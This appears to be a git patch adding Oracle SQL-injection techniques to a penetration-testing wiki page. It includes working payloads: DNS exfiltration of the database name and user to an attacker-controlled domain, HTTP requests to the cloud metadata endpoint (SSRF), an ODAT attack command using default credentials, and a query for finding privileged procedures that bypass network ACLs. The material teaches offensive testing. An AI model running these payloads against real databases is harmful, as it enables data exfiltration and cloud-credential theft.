From cc71a571fa0a9581db423c36aaa13df7e9415589 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Tue, 5 Aug 2025 16:24:44 +0000 Subject: [PATCH] Add content from: Research Update: Enhanced src/pentesting-web/sql-injection/o... --- .../sql-injection/oracle-injection.md | 94 ++++++++++++++++++- 1 file changed, 92 insertions(+), 2 deletions(-) diff --git a/src/pentesting-web/sql-injection/oracle-injection.md b/src/pentesting-web/sql-injection/oracle-injection.md index a2ab5851700..58a1e493a7c 100644 --- a/src/pentesting-web/sql-injection/oracle-injection.md +++ b/src/pentesting-web/sql-injection/oracle-injection.md @@ -156,9 +156,99 @@ select UTL_HTTP.request('http://scanme.nmap.org:25') from dual; A `ORA-12541: TNS:no listener` or a `TNS:operation timed out` is a sign that the TCP port is closed, whereas a `ORA-29263: HTTP protocol error` or data is a sign that the port is open. -Another package I have used in the past with varied success is the [`GETCLOB()` method of the `HTTPURITYPE` Oracle abstract type](https://docs.oracle.com/database/121/ARPLS/t_dburi.htm#ARPLS71705) that allows you to interact with a URL and provides support for the HTTP protocol. The `GETCLOB()` method is used to fetch the GET response from a URL as a [CLOB data type.](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)[select HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() from dual; +Another package I have used in the past with varied success is the [`GETCLOB()` method of the `HTTPURITYPE` Oracle abstract type](https://docs.oracle.com/database/121/ARPLS/t_dburi.htm#ARPLS71705) that allows you to interact with a URL and provides support for the HTTP protocol. The `GETCLOB()` method is used to fetch the GET response from a URL as a [CLOB data type.](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html) -{{#include ../../banners/hacktricks-training.md}} +``` +SELECT HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() FROM dual; +``` + +--- + +## Additional Packages & Techniques (Oracle 19c → 23c) + +### UTL_INADDR – DNS-based exfiltration and host discovery + +`UTL_INADDR` exposes simple name-resolution helpers that trigger an outbound DNS lookup from the database host. Because only a domain is required (no port/ACL needed) it is a reliable primitive for blind-exfil when other network callouts are blocked. + +```sql +-- Leak the DB name and current user via a DNS query handled by Burp Collaborator +SELECT UTL_INADDR.get_host_address( + (SELECT name FROM v$database)||'.'||(SELECT user FROM dual)|| + '.attacker.oob.server') FROM dual; +``` + +`get_host_address()` returns the resolved IP (or raises `ORA-29257` if resolution fails). The attacker only needs to watch for the incoming DNS request on the controlled domain to confirm code execution. + +### DBMS_CLOUD.SEND_REQUEST – full HTTP client on Autonomous/23c + +Recent cloud-centric editions (Autonomous Database, 21c/23c, 23ai) ship with `DBMS_CLOUD`. The `SEND_REQUEST` function acts as a general-purpose HTTP client that supports custom verbs, headers, TLS and large bodies, making it far more powerful than the classical `UTL_HTTP`. + +```sql +-- Assuming the current user has CREATE CREDENTIAL and network ACL privileges +BEGIN + -- empty credential when no auth is required + DBMS_CLOUD.create_credential( + credential_name => 'NOAUTH', + username => 'ignored', + password => 'ignored'); +END; +/ + +DECLARE + resp DBMS_CLOUD_TYPES.resp; +BEGIN + resp := DBMS_CLOUD.send_request( + credential_name => 'NOAUTH', + uri => 'http://169.254.169.254/latest/meta-data/', + method => 'GET', + timeout => 3); + dbms_output.put_line(DBMS_CLOUD.get_response_text(resp)); +END; +/ +``` + +Because `SEND_REQUEST` allows arbitrary target URIs it can be abused via SQLi for: +1. Internal port scanning / SSRF to cloud metadata services. +2. Out-of-band exfiltration over HTTPS (use Burp Collaborator or an `ngrok` tunnel). +3. Callbacks to attacker servers even when older callout packages are disabled by ACLs. + +ℹ️ If you only have a classical on-prem 19c but can create Java stored procedures, you can sometimes install `DBMS_CLOUD` from the OCI client bundle — useful in some engagements. + +### Automating the attack surface with **ODAT** + +[ODAT – Oracle Database Attacking Tool](https://github.com/quentinhardy/odat) has kept pace with modern releases (tested up to 19c, 5.1.1 – Apr-2022). The `–utl_http`, `–utl_tcp`, `–httpuritype` and newer `–dbms_cloud` modules automatically: +* Detect usable callout packages/ACL grants. +* Trigger DNS & HTTP callbacks for blind extraction. +* Generate ready-to-copy SQL payloads for Burp/SQLMap. + +Example: quick OOB check with default creds (takes care of ACL enumeration in the background): + +```bash +odat all -s 10.10.10.5 -p 1521 -d XE -U SCOTT -P tiger --modules oob +``` + +### Recent network ACL restrictions & bypasses + +Oracle tightened default Network ACLs in the July 2023 CPU — unprivileged accounts now receive `ORA-24247: network access denied by access control list` by default. Two patterns still allow callouts through SQLi: +1. Target account owns an ACL entry (`DBMS_NETWORK_ACL_ADMIN.create_acl`) that was added by a developer for integrations. +2. The attacker abuses a high-privilege PL/SQL definer-rights routine (e.g. in a custom application) that *already* has `AUTHID DEFINER` and the necessary grants. +If you encounter `ORA-24247` during exploitation always search for reusable procedures: + +```sql +SELECT owner, object_name +FROM dba_objects +WHERE object_type = 'PROCEDURE' + AND authid = 'DEFINER'; +``` +(in many audits at least one reporting/export procedure had the needed rights). +--- + +## References + +* Oracle Docs – `DBMS_CLOUD.SEND_REQUEST` package description and examples. +* quentinhardy/odat – Oracle Database Attacking Tool (latest release 5.1.1, Apr-2022). + +{{#include ../../banners/hacktricks-training.md}}